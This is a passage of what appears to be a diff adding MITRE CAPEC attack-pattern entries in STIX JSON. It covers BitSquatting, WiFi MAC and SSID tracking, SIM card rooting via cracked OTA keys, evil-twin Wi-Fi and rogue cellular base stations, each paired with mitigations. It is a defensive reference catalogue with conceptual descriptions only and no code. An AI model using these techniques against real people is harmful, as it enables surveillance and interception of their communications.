"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ad81b2e4-63b4-4d8e-9d96-4db93943afa2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--606914b1-f22c-4598-a173-6f4546572979", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. 
By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-61-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6ee9dff-2bc5-4eae-a4d6-b3f868cb8569", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fc9e23c-7780-4d34-8bd6-01ec3f063b9c", + "spec_version": "2.1", + "target_ref": "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries inject data into mobile technology traffic (data flows or signaling data) to disrupt communications or conduct additional surveillance operations.", + "external_references": [ + { + "external_id": "CAPEC-610", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/610.html" + } + ], + "id": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Data Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Attackers can disrupt or deny mobile technology 
communications and operations.)", + "Modify Data (Attackers can inject false data into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "High": "Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.", + "id": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-610-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4bbed6d4-6c57-4da2-ad62-002452b7960c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"An adversary registers a domain name one bit different than a trusted domain. A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.", + "external_references": [ + { + "external_id": "CAPEC-611", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/611.html" + }, + { + "description": "Artem Dinaburg, Bitsquatting: DNS Hijacking without exploitation, Raytheon", + "external_id": "REF-485", + "source_name": "reference_from_CAPEC", + "url": "http://media.blackhat.com/bh-us-11/Dinaburg/BH_US_11_Dinaburg_Bitsquatting_WP.pdf" + } + ], + "id": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BitSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

  2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.

  2. Techniques
    Register the BitSquatted domain.

Exploit

  1. Wait for a user to visit the domain: Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.

  2. Techniques
    Simply wait for an error in memory to occur, redirecting the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate all servers and perform redundant checks when using DNS hostnames.", + "id": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "spec_version": "2.1", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.", + "id": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70115677-16f7-4e4f-9e75-85108f13258f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "spec_version": "2.1", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). 
Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-612", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/612.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "WiFi MAC Address Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Automatic randomization of WiFi MAC addresses", + "id": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ada034dd-bae1-45e0-992d-43931ede09d7", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "spec_version": "2.1", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of handset and retransmission device", + "id": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42428530-f329-4129-baf4-f136e130d080", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "spec_version": "2.1", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-613", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID 
addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not enable the feature of \"Hidden SSIDs\" (also known as \"Network Cloaking\") – this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", + "id": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54e6bbee-8421-4ac9-ab72-d13af56bbbca", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "spec_version": "2.1", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequently change the SSID to new and unrelated values", + "id": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7cf4d3c7-8a07-460e-866b-2475c9ee85bb", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "spec_version": "2.1", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. 
These capabilities alone provide plenty of potential for abuse.", + "external_references": [ + { + "external_id": "CAPEC-614", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/614.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "description": "Karsten Nohl, Rooting SIM Cards, Security Research Labs", + "external_id": "REF-486", + "source_name": "reference_from_CAPEC", + "url": "https://srlabs.de/rooting-sim-cards/" + } + ], + "id": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Rooting SIM Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "A SIM card that relies on the DES cipher." + ], + "x_capec_skills_required": { + "Medium": "This is a sophisticated attack, but detailed techniques are published in open literature." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.", + "id": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-614-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73c5c39c-480b-411a-8be5-0ffe26aedee8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. 
This also allows the adversary to use \"adversary-in-the-middle\" (CAPEC-94) for all communications.", + "external_references": [ + { + "external_id": "CAPEC-615", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/615.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evil Twin Wi-Fi Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control Wi-Fi data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.", + "id": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-615-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6566c16f-35b1-476c-b9e5-0399cc905c82", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "spec_version": "2.1", + "target_ref": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.", + "external_references": [ + { + "external_id": "CAPEC-616", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/616.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Establish Rogue Location", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ], + "Integrity": 
[ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001" + ], + "x_capec_prerequisites": [ + "A resource is expected to available to the user." + ], + "x_capec_skills_required": { + "Low": "Adversaries can often purchase low-cost technology to implement rogue access points." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. 
the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passively monitor cellular network connection for real-time threat detection and logging for manual review.", + "id": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-617-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c58917b8-55ad-4997-bfa1-356553087aa1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "spec_version": "2.1", + "target_ref": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker uses knowledge of the target’s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target’s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. 
